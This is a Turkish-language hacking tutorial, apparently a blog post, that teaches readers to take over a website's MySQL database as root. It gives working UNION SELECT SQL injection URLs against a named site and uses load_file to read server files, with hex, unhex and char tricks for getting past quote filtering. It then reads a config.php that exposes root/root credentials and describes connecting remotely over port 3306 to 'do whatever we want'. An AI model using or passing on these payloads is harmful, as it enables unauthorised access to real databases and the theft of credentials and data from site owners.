s.a arkadaşlar mysql root anlatacağım
mysql root için load_file okumamız l
azım onun içinde mysql.user'in olması lazım.
mysql.user'in olsuğunu varsayalım.
column sayılarını eşitlenmiş farzediyosrus
:D buraları anlatmıştık :D
sitemiz thenesa.com/nesa.php?id=-9999 union select 1,2,3--
şimdi load_file içinde sitenin uzantısını bilmek gerekiyo
hatadan /home/thenesa/httpdocs/nesa.php uzantısı aldık.
şimdi bunu okuyalım.
thenesa.com/nesa.php?id=-9999 union select 1,load_file('/home/thenesa/httpdocs/nesa.php'),3--
magic var farzedelim
thenesa.com/nesa.php?id=-9999 union select 1,load_file(0xhexlenmiş hali:D),3--
yine olmadı şimdi
thenesa.com/nesa.php?id=-9999 union select 1,unhex(hex(load_file(0xhexlenmiş hali:D))),3--
yine olmassa charlayın
thenesa.com/nesa.php?id=-9999 union select 1,load_file(char bilmem ne :D),3--
oda olmadı
thenesa.com/nesa.php?id=-9999 union select 1,load_file(char bilmem ne :D),3--
unhex yaptıkya benzerini charla yapın yani
full char v.s v.s olur yani tabi mysql.user varsa.
şimid okuduk. baktık sitede config.php var :D
onu okuyak şimdi . /home/thenesa/httpdocs/config.php
onuda okuduk yukardaki gibi :D
baktık karşımıza
şöle bişe çıktı
// database server
$forum_server = “localhost”; //
// database user name
$forum_un = “root”;
// database password
$forum_pw = “root”;
// database name
$forum_database = “sqldb”;
?>
burdan db user name root pass root olduğunu öğreniyoruz.
öğrenelim :D
user root pass root :D
onlarıda aldık şimdi sitenin ip sini alıp
(ip almayı biliyosnuz dimi :D ping le :D)
MySQL Front v.b programlarla siteye bağlanıp root olcas
ama burdada bi güvenlik sorunu var
bağlana bilmem için sistemin 3306 portunun
açık olması lazım. eğer portumuzda açıksa
MySQL Front v.b programlarla bağlnıp
istediğimiz herşeyi yapabilirs.
kolay gelsin.
not: biras özet anlattım ayrıntılarda
load_file okumalarında sorun yaşarsanız onuda
ayrıntısıyla anlatırım istek olursa tabi.
işte mysql front Download
by TheNeSa
saqol qüseL anlatmışın
YanıtlaSil